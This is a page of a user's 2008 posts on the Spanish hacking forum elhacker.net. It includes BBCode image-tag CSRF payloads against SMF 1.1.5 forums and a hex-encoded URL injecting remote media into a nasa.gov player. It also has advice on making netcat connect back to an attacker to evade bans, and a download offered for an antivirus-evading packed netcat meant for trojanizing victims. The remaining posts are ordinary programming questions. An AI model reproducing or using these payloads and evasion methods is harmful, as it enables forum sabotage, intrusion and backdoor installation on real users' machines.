elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


  Mostrar Mensajes
Páginas: 1 ... 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 [428] 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 ... 456
4271  Seguridad Informática / Nivel Web / Re: XSRF en foros SMF => 1.1.5 en: 23 Agosto 2008, 10:45 am
Bueno, eso de ejecutar scripts atraves de imagenes es otro tema :P, claramente se podría tener tu ip ta,bién pero este no es el tema.

La falla solo puede hacer que el index se te vean todas las secciones colapsadas cada ves que veas la firma de alguien que tega ánimos de molestar.
4272  Seguridad Informática / Nivel Web / [°] CSRF en foros SMF => 1.1.5 en: 23 Agosto 2008, 09:41 am
Por un foro limpio y ordenado vivan los CSRF de SMF 1.1.5  :P

visualiza el index del foro.

Fuente:
http://www.jccharry.com/comunidad/index.php?board=8.0

Código:
[img]http://www.jccharry.com/pruebas/smf1.0.5/1.jpg?colapsar=1&url=http://foro.elhacker.net/[/img]
[img]http://www.jccharry.com/pruebas/smf1.0.5/1.jpg?colapsar=2&url=http://foro.elhacker.net/[/img]
[img]http://www.jccharry.com/pruebas/smf1.0.5/1.jpg?colapsar=4&url=http://foro.elhacker.net/[/img]
[img]http://www.jccharry.com/pruebas/smf1.0.5/1.jpg?colapsar=6&url=http://foro.elhacker.net/[/img]
[img]http://www.jccharry.com/pruebas/smf1.0.5/1.jpg?colapsar=9&url=http://foro.elhacker.net/[/img]
[img]http://www.jccharry.com/pruebas/smf1.0.5/1.jpg?colapsar=10&url=http://foro.elhacker.net/[/img]
4273  Seguridad Informática / Nivel Web / Bug en nasa.gov en: 17 Agosto 2008, 16:23 pm
http://www.nasa.gov/multimedia/nasatv/on_demand_video.html?param=%68%74%74%70%3A%2F%2F%77%77%77%2E%6A%63%63%68%61%72%72%79%2E%63%6F%6D%2F%70%72%75%65%62%61%73%2F%6E%61%73%61%2E%67%6F%76%2F%77%68%6B%2E%61%73%78

Que chulo está este bug  :P los parámetros del reproductor son remotos y no locales.

Fuente: http://www.jccharry.com/comunidad/index.php?topic=5.0
4274  Seguridad Informática / Nivel Web / Vulnerabilidad universal en foros y blogs (csrf) en: 20 Julio 2008, 03:59 am
Bueno, he encontrado una falla que permitiría crear un post y no permitir que alguien pueda responder o que algún administrador/moderador pueda borrartelo.

Esta falla afecta a la mayoría de los sistemas en el cual puedes postear o crear usuarios en linea y no tan solo foros.

La explicación está acá:

Fuente:
http://foro.new-bytes.net/f28/vulnertabilidad-universal-en-foros-y-blogs-t344.html
4275  Seguridad Informática / Hacking / Re: Jugando con netcat en: 19 Julio 2008, 19:47 pm
Citar
"no se encuentra el archivo"
Es porque no encuentra el archivo que puede ser el netcat... talves el ciber tuene antivirus y te lo borra.

Cklaro que puedes poner tu no-ip en ves de tu ip aunque te banearán dentro de no mucho ya que los admins de no-ip prohiben estas cosas.
Busca otras alternativas, como por ejemplo poner tu ip en un txt en un host y que el netcat lo descargue y se conecte a esa ip con un loop goto.
4276  Programación / Programación Visual Basic / Re: HTTPS SSL con Winsock control en: 9 Julio 2008, 08:52 am
Ya lo encontré, es un control que permite conexiones ssl igual que winsock pero llamado SSLSock.

Lo encontré en una página japonesa XD gracias google jajaja
4277  Seguridad Informática / Hacking / Re: Jugando con netcat en: 9 Julio 2008, 08:13 am
Citar
¿NOD32 detectaba como amenaza al netcat?. Pues yo uso NOD32 y siempre actualizado y al netcat no lo detecta. Yo uso cryptcat, y tampoco me lo detecta. Y en cuanto al método que uso para dejar indetectable un archivo es el que publicó octhal eliminando firmas (no así la heurística).

El nod32 toma al NetCat como Troyano Radmin al igual que cryptcat.

No dije que fuera 100% indetectable pero por lo menos va a sobrepasar a varios antivirus... el metodo de eliminar firmas al final te quedas sin archivo XD, el programa de e0n funcionaba bién pero no recoge argumentos.

Formas de hacerlo indetectable hay muchas, incluso creo que la mas optima es reconstruyendo el código fuente reemplazando variables y constantes y algunas funciones hacerlas trabajar de diferente manera pero con el mismo resultado, etc.

Al final si hablamos de eso mejor decimos que no es necesario utilizar netcat para troyanizar a alguien XD. Recuerda que esta sección es de Hacking Básico y si alguien quiere algo 100% indetectable que aprenda a programar sus propios troyanos en cpp o asm.
4278  Seguridad Informática / Hacking / Re: Jugando con netcat en: 9 Julio 2008, 06:49 am
Un regalo para que sigan jugando con NetCat XD
Hice un nuevo NetCat que debería serf indetectable por muchos antivirus. Aunque hay mas formas de hacerlo solamente lo empaqueté en armadillo con certificado propio y sin mensaje de bienvenida.

Netcat Indetectable (No para el 100% de los av.)
http://descargas.jccharry.com/index.php?archivo=%2FBinarios%2FNetCat+indetectable.rar

Probado en Nod32.
4279  Programación / Programación Visual Basic / HTTPS SSL con Winsock control en: 9 Julio 2008, 04:55 am
Necesito manipular un sitio que trabaja solamente con https utilizando Sockets y no ieframe.

Alguien sabe algo del tema???

Por ahi leí algo sobre winsock 2.0 pero creo que es solo para .net y yo lo necesito para vb6.
4280  Programación / PHP / Re: com insertar el ip al navegador en: 21 Junio 2008, 07:01 am
Citar
header("Content-type: 1/jpeg");

Citar
header("Content-type: image/jpeg");


Para el SO no está relacionado un archivo "1"
Páginas: 1 ... 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 [428] 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 ... 456
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines